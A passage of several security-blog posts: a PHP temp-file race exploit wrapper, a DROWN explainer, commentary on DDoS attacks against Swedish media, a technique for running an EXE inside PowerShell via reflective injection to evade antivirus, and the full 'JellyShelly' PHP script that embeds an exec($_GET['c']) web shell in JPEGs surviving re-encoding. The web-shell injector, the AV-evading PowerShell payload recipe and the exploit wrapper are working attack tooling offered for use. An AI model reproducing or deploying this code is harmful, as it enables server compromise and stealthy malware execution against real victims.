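That restart-based optimization could be orchestrated with a small wrapper. This is only a sketch; the meaning of Hera’s positional arguments is an assumption drawn from the invocation shown in this article:

```python
import subprocess
import time

def hera_cmd(host, port):
    # Mirrors the invocation used in this article; the meaning of the
    # positional arguments is an assumption based on that example.
    return ["./hera", host, str(port), "100", "2", "/index.php",
            "0.001", "20", "0", "0", "40"]

def run_bursts(host, port, rounds=10, burst_seconds=30):
    """Run short aborted Hera bursts so the server keeps allocating
    fresh temporary file names, raising the odds of hitting a guess."""
    for _ in range(rounds):
        proc = subprocess.Popen(hera_cmd(host, port))
        time.sleep(burst_seconds)  # let one set of uploads begin
        proc.terminate()           # abort -> next round gets new tmp names
        proc.wait()
```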

./hera 10.11.12.69 80 100 2 /index.php 0.001 20 0 0 40
~=Hera 0.8=~

[+][2016-10-28 17:23:17] Building payload
[+][2016-10-28 17:23:17] Starting threads

time python3 LocalExecPoC.py
Code executed

real 0m49.778s
user 0m5.528s
sys 0m0.828s

Now, this was on Windows, and the code for creating temporary files in mod_php differs depending on the operating system. The default function on Linux is more secure but could still be attacked (although this would take a lot more time). I will build a proof-of-concept for the Linux scenario as well, and update this article when it’s finished. But for now you will have to be satisfied with these results🙂.

[Image: apachetmpfiles]

As you can see in the image above, the names on Linux are longer and more random, making them a lot harder to guess. The code below shows some Windows-specific code related to the creation of the temporary file. The complete code can be found at the link below.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/php_open_temporary_file.c#L165

#ifdef PHP_WIN32
	cwdw = php_win32_ioutil_any_to_w(new_state.cwd);
	pfxw = php_win32_ioutil_any_to_w(pfx);
	if (!cwdw || !pfxw) {
		free(cwdw);
		free(pfxw);
		efree(new_state.cwd);
		return -1;
	}

if (GetTempFileNameW(cwdw, pfxw, 0, pathw)) {

Linux uses the mkstemp function to generate the random part of the file names. This is pretty secure but not foolproof. As mentioned earlier, I will update this article when I have test data for this scenario as well. More to come.
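A back-of-the-envelope comparison shows why the Linux names take so much longer to guess. The charset and length for mkstemp are assumptions based on the common glibc implementation (six characters drawn from letters and digits):

```python
# GetTempFileName: "php" prefix + up to four hex digits
windows_space = 16 ** 4
# glibc mkstemp: six characters from [a-zA-Z0-9]
linux_space = 62 ** 6

print(windows_space)  # 65536
print(linux_space)    # 56800235584
```

So the Linux name space is roughly six orders of magnitude larger, which is why brute forcing it over a file inclusion is slow but not impossible.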

UPDATE – 161129: I’ve tried to contact the PHP security team about this (twice) and have not received a single response. I have therefore decided to just post this now and all future results relating to this issue.

Posted in Hacking, Security

DROWN – How the deprecated SSLv2 protocol can compromise modern TLS connections

Last month a serious SSL/TLS vulnerability named “DROWN” – “Decrypting RSA with Obsolete and Weakened eNcryption” – broke the surface. In this article I will explore the mechanics of the attack and why it works. I wanted to have a closer look at DROWN because it is a beautiful hack and a prime example of how the mere existence of deliberately weakened ciphers hurts us still today, years after we’ve deprecated them. But first…

Some practical information

DROWN is a padding oracle attack that enables an attacker to obtain the session keys for, and hence decrypt, a captured TLS session by repeatedly probing the server using the SSLv2 protocol. Use of SSLv2 has long been deprecated by browsers and before DROWN it was believed that supporting SSLv2 was not a big issue since clients would never use it. However, DROWN shows us how merely supporting an outdated protocol like SSLv2 can pose a real threat to more modern protocols.

Is your server vulnerable?

A test for vulnerability, together with the essential practical information, has been published on a dedicated website:

https://drownattack.com/#check
https://drownattack.com/

A server is vulnerable if it supports SSLv2 with export-grade ciphers, or it shares its certificate with a server that does. At the time of disclosure (March 1st), that was 33% of HTTPS servers on the web.

The efforts of the attacker (feasibility)

The attacker has to passively eavesdrop on about 1,000 TLS connections to a vulnerable server in order to successfully decrypt a victim’s session. The attack then requires the attacker to spend, for example, $440 on the Amazon EC2 cloud computing platform for about 8 hours of computation, or, in the case of OpenSSL versions that predate March 4, 2015, less than a minute on a single PC.

Dissecting the vulnerability

Now let’s have a look at what the vulnerability is. I won’t get into the underlying mathematics because they are, of course, quite involved. Here we go…

Decrypting a secure connection

In a secure connection the client and server negotiate secret session keys in order to be able to encrypt all the traffic of their session. This negotiation is called a “handshake”.

The secrecy of these session keys relies on the secrecy of a so-called “pre-master secret” (PMS) which is used by both server and client to derive the same session keys. During the handshake the client generates the PMS and sends it to the server in a message called “ClientKeyExchange” which is encrypted using the server’s public key.

So the problem for an eavesdropping attacker is to get the plain-text PMS from the encrypted “ClientKeyExchange” message.

Bleichenbacher’s Oracle

DROWN exploits the fact that SSLv2, because of support for weak 40-bit export-grade ciphers, is vulnerable to a kind of padding oracle attack that was first introduced by Daniel Bleichenbacher in 1998. The DROWN researchers have shown us that this oracle can also be used to decrypt a modern TLS connection if the same certificate, hence the same RSA key pair, is used for serving both SSLv2 and TLS.

Bleichenbacher’s attack, and therefore also DROWN, applies to a particular padding scheme called “PKCS#1 v1.5” which is standard for RSA-based handshakes for both SSL and TLS. A padding scheme is used to expand a piece of plain-text to make it conform to the block size of a particular cipher algorithm.
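For reference, PKCS#1 v1.5 encryption padding has a very simple shape, and the conformance check whose outcome the oracle leaks can be sketched in Python. This is a simplified sketch, not a hardened implementation (real code must also run in constant time):

```python
import os

def pkcs1_v15_pad(message: bytes, k: int) -> bytes:
    """PKCS#1 v1.5 encryption padding for a k-byte modulus:
    0x00 0x02 | >= 8 nonzero random bytes | 0x00 | message."""
    pad_len = k - 3 - len(message)
    if pad_len < 8:
        raise ValueError("message too long for modulus size")
    padding = bytes((b % 255) + 1 for b in os.urandom(pad_len))  # force nonzero
    return b"\x00\x02" + padding + b"\x00" + message

def is_pkcs1_v15_conformant(em: bytes) -> bool:
    """The yes/no answer a Bleichenbacher oracle effectively reveals."""
    return (len(em) >= 11
            and em[0] == 0x00 and em[1] == 0x02
            and all(b != 0 for b in em[2:10])   # first 8 padding bytes nonzero
            and 0x00 in em[10:])                # a separator must exist
```

Each “yes” from such a check narrows the interval of possible plain-texts, which is what the attack iterates on.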

Bleichenbacher showed how an attacker can deduce the plain-text contents of an encrypted message if the server discloses whether or not any submitted cipher-text is decrypted by the server into a correctly padded message according to the PKCS#1 v1.5 standard. Using a succession of chosen cipher-texts which are related to the target cipher-text, the attacker can then successively narrow the interval of possible values for the target plain-text. The submitted cipher-texts are successively refined based on the responses from the server and this is repeated until the interval of possible values for the target plain-text has been reduced to contain only the target plain-text itself. Bleichenbacher showed how this attack could be used on contemporary SSL handshakes to obtain the session keys of a recorded session.

The countermeasure for Bleichenbacher’s attack in SSL/TLS implementations is to protect the handshake by not letting the server disclose whether or not the “ClientKeyExchange” message contains a correctly padded PMS. Instead, if the server finds a wrongly padded PMS when decrypting the “ClientKeyExchange” message, then the server will randomly make up its own PMS and go ahead with the protocol. The protocol will then fail when the client and server exchange “finished” messages to conclude the handshake. The “finished” messages are encrypted using the derived session keys and if the server generated its own PMS, instead of getting it from the client, then the server’s derived session keys will not match whatever keys the client has come up with. The communication will then fail without having told the client whether or not the PMS was correctly padded and Bleichenbacher’s attack is therefore prevented.

With this countermeasure in mind we now note that if an attacker would send the same cipher-text twice then one of two things will happen: Either the cipher-text can be decrypted by the server into a correctly padded PMS message and the server will calculate session keys from the received PMS, or: The decrypted PMS will not be correctly padded and the server will randomly generate a PMS on its own. Having submitted the same cipher-text twice the first case will result in the server using same PMS twice to derive the session keys. The second case will result in two different randomly selected PMSs. So if there is a way for the attacker to tell if the server has used the same PMS twice when deriving the session keys then Bleichenbacher’s attack is re-enabled.

This is where the insufficiency of SSLv2 comes into play.

How SSLv2 breaks everything

SSLv2 has many flaws. Two of them in particular allow the attacker to learn whether or not the server has used the same PMS* for two handshakes.

(* In SSLv2 there actually is no “PMS”, instead there is a “Master Key”, also chosen by the client. But that’s beside the point and I’m going to keep referring to it as “PMS” for simplicity.)

Flaw 1: In the SSLv2 protocol (or at least all of its implementations) the server eagerly responds with a “ServerVerify” message immediately upon receiving the PMS, before the client has demonstrated knowledge of the session keys. The “ServerVerify” message is simply a random number, chosen by the client in the first stage of the handshake, encrypted using the server’s derived session key. The purpose of this message is to demonstrate to the client that the server knows the private key corresponding to its certificate and has successfully derived the session keys.

Flaw 2: SSLv2 allows export-grade 40-bit encryption whose 2^40 key space can feasibly be searched by brute-force.

When exploiting these flaws the attacker will send its candidate cipher-text to the server and receive the “ServerVerify” message. The attacker will then perform a brute-force search over all 2^40 possibilities for the export-grade PMS to find the PMS that derives a server session key that successfully decrypts the “ServerVerify” message. The attacker will know when a brute-force attempt is successful because the message will then decrypt into the random number he has previously chosen.
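The structure of that brute-force step can be sketched as follows. Here `derive_and_decrypt` is a hypothetical stand-in for the server’s SSLv2 key derivation plus the export cipher’s decryption, and at the full 40 bits this loop is exactly where the EC2 bill comes from:

```python
def brute_force_master_key(server_verify_ct, challenge, derive_and_decrypt,
                           key_bits=40):
    """Search the export-grade keyspace for the key whose derived
    session key decrypts ServerVerify into the attacker-chosen
    challenge. Returns the key, or None if nothing matches."""
    for key in range(2 ** key_bits):
        if derive_and_decrypt(key, server_verify_ct) == challenge:
            return key
    return None
```

A second run with the same candidate cipher-text then only needs to check the single key found here, which is how the attacker detects that the server used the same PMS twice.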

Having found the PMS of the first message the attacker then submits the same candidate cipher-text again and receives the “ServerVerify” message. He now uses the PMS found from the first message to derive the server session key for this second session. If this server session key successfully decrypts the “ServerVerify” message then the attacker knows that the server has arrived at the same PMS twice, turning the server into a Bleichenbacher oracle.

This is DROWN: Bleichenbacher’s attack on RSA resurrected because of the weakness of SSLv2.

TLS is not SSL but…

There is one complication that an attacker must overcome in order to exploit DROWN to obtain the plain-text PMS from a victim’s TLS session: A “ClientKeyExchange” message for the TLS protocol does not necessarily conform to a 5-byte (40-bit) export-grade plain-text padded according to PKCS#1 v1.5. In fact, the chances that it does are pretty slim. However, it turns out that the attacker can apply cleverly chosen multiplication factors in order to greatly improve the chances of a target cipher-text being PKCS#1 v1.5 export-grade compliant. The attacker can expect success for about 1 in 1000 eavesdropped TLS connections.

Also the attack yields only a few plain-text bytes at a time because of the tiny key/PMS of the export-grade cipher. However this is a minor obstacle because the attacker can “rotate” the plain-text part exposed by the oracle to successively work out the full TLS PMS of the victim’s session. The underlying mathematics are quite involved and I refer the reader to the original paper for studying the details.

All-in-all, an attacker can expect to decrypt about 1 in 1000 recorded TLS sessions at the cost of $440 on Amazon EC2. Brute-forcing the “ServerVerify” message accounts for the larger part of the computational cost of performing the attack.

Special DROWN turns bad into worse!

This article has studied the general case. I would now like to turn your attention to “special DROWN”. When discovering DROWN the researchers also discovered a bug in OpenSSL that had, by coincidence, already been fixed on March 4, 2015. This bug has been designated CVE-2016-0703, and the researchers were able to exploit it to cut the number of required oracle connections by 50% and reduce the computational effort so that the attack can be performed in less than a minute on a single PC.

So, vulnerable OpenSSL installations that predate March 4, 2015 cost essentially nothing to attack. The general DROWN attack has a significant price tag attached to it, but one can expect it to be well within the budget of an attacker going after a high-value target.

In conclusion, DROWN is a serious threat.

Posted in Security

Problematic denial of service attacks

If you are a regular reader of any relatively large Swedish newspaper, the recent attack on Swedish media this weekend has probably not escaped your notice. At approximately 20:00 on Saturday evening, the 19th of March, a number of denial of service attacks began against Swedish media websites.

Some of the confirmed victims were (source):
http://www.aftonbladet.se/
http://www.expressen.se/
http://www.dn.se/
http://www.svd.se/
http://www.sydsvenskan.se/
http://www.di.se/
http://www.hd.se/
http://vlt.se/
http://na.se/

Shortly before the attacks started, a threat was made via a Twitter account, saying that attacks were going to be aimed at Swedish media and government websites in the following days.

[Image: notJ-Twitter — screenshot of the Twitter threat]

The stated reason for the attacks, “spreading false propaganda”, is pretty vague, but I’m not writing this article to speculate on that. A lot of people are speculating that the attacks originated from Russia, since most (if not all) of the abusive traffic seemed to come from there. I don’t think we should focus too much on the Russian angle. It might as well be someone inside Sweden who bought a botnet and wants to test its capacity. Think about it: if you wanted to buy a large number of infected computers that are close to your targets in Sweden, where would you turn first? I know where I would go, at least.

Russia is a large country with a lot of Internet users (103,147,691) and there is a culture of selling botnets of infected Russian machines. This makes it ideal for someone looking to buy cheap bots. It’s also important to remember that there are no borders on the Internet. If you are an American wanting to attack a Russian server, you might as well use Russian bots, simply because they are easy to acquire and fewer hops away from the target machine. Of course, it might also be a botnet spanning other countries, not just Russia; in this case the traffic just happened to come mostly from there.

Personally I find the low-bandwidth types of denial of service very interesting, where you use a flaw in the application to either exhaust the server’s resources or cause a crash via some sort of bug. I’m not much of a fan of the regular distributed denial of service attacks where, if you scream loud enough, the infrastructure gives in to the pressure. But there are high-traffic attacks that can be quite fascinating, like an NTP amplification attack. While I’m at it I would also like to mention the THC SSL DoS attack, which was released in 2011 and is still usable today for stressing an SSL endpoint on a server.

I don’t know the exact nature of the attack against the media websites, but one could speculate that it was a combination where a botnet attacks a resource on the target system that consumes a lot of resources, which could then effectively take down the server. One thought that crossed my mind was that some of these systems handle a large amount of traffic every day and were still taken down in what seemed to be a fairly simple way.

Play with the thought of the perpetrators finding a page on these sites that takes a relatively long time to load because it has to make a large number of queries to a database. Or let’s say they found a debug page that only says “hello world” and then does a bunch of background processing to test the back-end server. It might not output any interesting data that an attacker can make use of (thus being a low priority for the site maintainer to remove), but it can still be very useful in a denial of service attack.

Protecting against denial of service is not just a “one package” solution (even though there are packaged solutions that would surely help these sites a lot). The fact that these systems were taken down on a weekend evening, when one would expect the traffic to be low, only shows how vulnerable they are. It can also be seen as a message from the perpetrators saying “we can do this whenever we want”, which of course also signals to other evil villains on the Internet that the Swedish media systems are easy targets.

Depending on the exact nature of the attack, the solution to these problems will need some serious planning and dedication. Some of the solutions to denial of service issues are just a patch away; some are not. If a large organisation with services that need to stay online wants to protect against these problems, it will also have to test against them. And I’m not only talking about the regular DDoS attack that floods the infrastructure with too much data, but also the low-bandwidth sneak attacks like Slowloris, slowpost, slowget, slowread and all other kinds of similar attacks (slow-loading pages, crash flaws, SQL-injected sleep calls, etc.) that would need a security review to be discovered and properly taken care of. One solution that comes to mind is decentralization of the kind Akamai offers, where a service is spread out geographically so that a user accessing it gets a node fewer hops away. This kind of setup also helps mitigate denial of service attacks.

In this case it doesn’t really matter to me who actually carried out the attacks. It’s bad enough that the systems were all taken down, and the people responsible for those infrastructures need to learn from this and take action soon so that it won’t happen again. This also makes you think about other critical infrastructure in the country: government websites, hospitals and so on. Is it all just a catastrophe waiting to happen? Even if we were to find the one(s) responsible for these attacks, the fact remains that a lot of systems are vulnerable to some type of denial of service. The most future-proof solution, generally, is to build software architecture and infrastructure that solves these problems.

As of writing this, the only attack so far was the one during Saturday night. The Twitter account that made the initial threat has been removed (by whom is uncertain). Although it’s not confirmed that the attacks are actually linked to that specific account, the timing was just too good to dismiss as pure coincidence.

I would like to thank Emil Kvarnhammar, Marcus Murray, Stefan Ivarsson and Simon Strandberg for insightful input when writing this article.

Posted in Security

Embedding EXE files into PowerShell scripts

As sometimes happens, when you solve a particular problem, you realize that the solution can be generalized to cover more scenarios than the one you had in mind. This is one of those stories.

I was trying to resolve an issue with creating a pure PowerShell payload as part of a client-side attack. Using PowerShell to run malicious code has many advantages, including:

  • No need to install anything on the target.
  • Very powerful engine underneath (e.g. you can directly invoke .NET code).
  • You can use base64-encoded commands to obfuscate your evil commands, making the attack a little less obvious to spot. This is also a way to avoid escaping all the special characters, especially in advanced attacks involving several steps to deliver the payload.
  • You can use Invoke-Expression to interpret strings as PowerShell commands. From a penetration tester’s perspective, this is very useful to avoid writing complex scripts to disk. For example, you can use PowerShell to download an additional (complex) script and pipe it directly to Invoke-Expression, which will interpret and execute the downloaded script in memory, within the PowerShell process. This also helps avoid antivirus detection.

The payload I wanted to run on the target included fairly complex functionalities. I had those functionalities as part of an EXE file. I didn’t want to drop the binary on the target system since it could potentially trigger an antivirus. I wanted to use PowerShell, but I didn’t want to rewrite the whole thing in PowerShell.

So I came up with a solution.

The objective is to embed a binary into a PowerShell script, and run it from within the script without writing it on disk.

This is how the solution works:

1. Take your binary file and base64-encode it

You can use the following function:

function Convert-BinaryToString {
    [CmdletBinding()] param (
        [string] $FilePath
    )

    try {
        $ByteArray = [System.IO.File]::ReadAllBytes($FilePath)
    }
    catch {
        throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct."
    }

    if ($ByteArray) {
        $Base64String = [System.Convert]::ToBase64String($ByteArray)
    }
    else {
        throw '$ByteArray is $null.'
    }

    Write-Output -InputObject $Base64String
}

2. Create a new script with the following:

  • The EXE converted to string created in point 1
  • The function Invoke-ReflectivePEInjection (part of the Powersploit project)
  • Convert the string to byte array
  • Call Invoke-ReflectivePEInjection

So basically your binary is just a string in the PowerShell script. Once decoded into a byte array, the function Invoke-ReflectivePEInjection will run it in memory within the PowerShell process.

The final payload will look something like this:

# Your base64 encoded binary
$InputString = '...........'

function Invoke-ReflectivePEInjection
{
   ......
   ......
   ......
}

# Convert base64 string to byte array
$PEBytes = [System.Convert]::FromBase64String($InputString)

# Run EXE in memory
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

You can now run the script on the target like this:

powershell -ExecutionPolicy Bypass -File payload.ps1

Depending on the binary you embedded, you might get the following error:

PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)

To fix the issue, simply run the 32-bit PowerShell:

%windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File payload.ps1

In the example below, I embedded plink.exe in payload.ps1.

[Image: screenshot of plink.exe running from payload.ps1]

Pretty cool, huh?

Posted in Hacking

JellyShelly 1.7, progress has been made

So I decided it was time to update this script to make it easier to use. I realized a while ago that it was quite hard to work with, since this little trick doesn’t work on all images. If you wanted to inject code into an image, you would therefore sometimes have to sit for several hours, running the script over and over with different images until you got a hit. This isn’t optimal, so I have made some simple adjustments to the script.

The fix: use one of the many neat placeholder image services online🙂.

Two of these are:

https://placehold.it/
http://lorempixel.com/

The first one only offers grey images, so I picked the second one, which offers all kinds of images (more fun and more stealthy). What the script does now is simply download a random image of random size (100–1500 px width/height) and use it to try to inject the data. If it succeeds, it saves the resulting image (which you can later use against an upload function that uses the imagejpeg function). If it fails, it removes the image and downloads a new one. At the moment the script will run until it succeeds.

Later on I might add some more advanced functionality, as well as a more refined and usable interface for the script. Two functions I wish to implement are re-sizing of images, and images where watermarks are added during the process.
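The injection search in the code below boils down to a simple pattern: overwrite a window of bytes in the scan data with the payload, re-encode, and check whether the payload survived. A minimal sketch in Python, where `re_encode` is a stand-in for PHP’s imagejpeg() round trip:

```python
def find_injection_point(data: bytes, payload: bytes, start: int, re_encode):
    """Walk backwards from the end of the JPEG data, overwrite
    len(payload) bytes at each position, and return the first
    position where the payload survives re-encoding."""
    for i in range(len(data) - len(payload), start, -1):
        candidate = data[:i] + payload + data[i + len(payload):]
        if payload in re_encode(candidate):
            return i
    return None
```

The real script does exactly this with GD, which is why it can take many images before one happens to have a position where the payload is preserved.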

Anyway, code!

<?php
ini_set('display_errors', 1);
error_reporting(E_PARSE);

$orig = 'image.jpg';
$code = '<?=exec($_GET["c"])?>';
$quality = 80;
$base_url = "http://lorempixel.com";
/*$code = '<?php system($_GET["c"])?>';*/
/*$code = '<?=$a=`ls`?>';*/

echo "-=Imagejpeg injector 1.7=-\n";

do 
{
    $x = rand(100, 1500);
    $y = rand(100, 1500);
    $url = $base_url . "/$x/$y/";

    echo "[+] Fetching image ($x X $y)\n";
    file_put_contents($orig, file_get_contents($url));
} while(!tryInject($orig, $code, $quality));

echo "[+] It seems like it worked!\n";
echo "[+] Result file: image.jpg.php\n";

function tryInject($orig, $code, $quality)
{ 
    $result_file = 'image.jpg.php';
    $tmp_filename = $orig . '_mod2.jpg';

    //Create base image and load its data
    $src = imagecreatefromjpeg($orig);
    imagejpeg($src, $tmp_filename, $quality);
    $data = file_get_contents($tmp_filename);
    $tmpData = array();
     
    echo "[+] Jumping to end byte\n";
    $start_byte = findStart($data);
     
    echo "[+] Searching for valid injection point\n";
    for($i = strlen($data)-1; $i > $start_byte; --$i)
    {
        $tmpData = $data;
        for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
        {
            $tmpData[$n] = $code[$z];
        }
     
        $src = imagecreatefromstring($tmpData);
        imagejpeg($src, $result_file, $quality);
     
        if(checkCodeInFile($result_file, $code))
        {
            unlink($tmp_filename);
            unlink($result_file);
            sleep(1);
     
            file_put_contents($result_file, $tmpData);
            echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";
     
            sleep(1);
            $src = imagecreatefromjpeg($result_file);

            return true;
        }
        else
        {
            unlink($result_file);
        }
    }
    unlink($orig);
    unlink($tmp_filename);
    return false;
}

function findStart($str)
{
    // Stop one byte early since we look at $str[$i+1] below
    for($i = 0; $i < strlen($str)-1; ++$i)
    {
        if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
        {
            return $i+2;
        }
    }
 
    return -1;
}
 
function checkCodeInFile($file, $code)
{
    if(file_exists($file))
    {
        $contents = loadFile($file);
    }
    else
    {
        $contents = "0";
    }
 
    return strstr($contents, $code);
}
 
function loadFile($file)
{
    $handle = fopen($file, "r");
    $buffer = fread($handle, filesize($file));
    fclose($handle);
 
    return $buffer;
}

Some sample output

-=Imagejpeg injector 1.7=-
[+] Fetching image (1409 X 934)
[+] Jumping to end byte
[+] Searching for valid injection point
[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed
[+] It seems like it worked!
[+] Result file: image.jpg.php

An important note about the current state of the script is the “Temp solution” message. What it means is that if you get an error such as the one below, the process most likely failed.

In that case you should restart the script. This happens from time to time and is so far something I haven’t been able to detect automatically, and thus haven’t been able to handle automatically. If anyone has a solution for this issue, feel free to comment below.

PHP Parse error: imagecreatefromjpeg(): gd-jpeg, libjpeg: recoverable error:
in Workspace/jellyshell/jellyauto.php on line 63

Parse error: imagecreatefromjpeg(): gd-jpeg, libjpeg: recoverable error:
in Workspace/jellyshell/jellyauto.php on line 63


Posted in Hacking

Generating a useful file listing using PowerShell

When trying to figure out what happened on a machine during a specific time-frame, a sorted file listing is quite useful.

There are several ways of going about creating one, and as requested, here’s how I do it in PowerShell.


Get-ChildItem -Recurse | Sort-Object CreationTime | Format-Table CreationTime,FullName -auto
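For comparison, here is a rough Python equivalent of the same listing. Note that `st_ctime` only means creation time on Windows; on Unix it is the metadata-change time:

```python
from pathlib import Path

def file_listing(root="."):
    """Recursively list files under root, sorted by st_ctime
    (creation time on Windows, metadata-change time on Unix)."""
    files = [p for p in Path(root).rglob("*") if p.is_file()]
    files.sort(key=lambda p: p.stat().st_ctime)
    return files
```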

Posted in General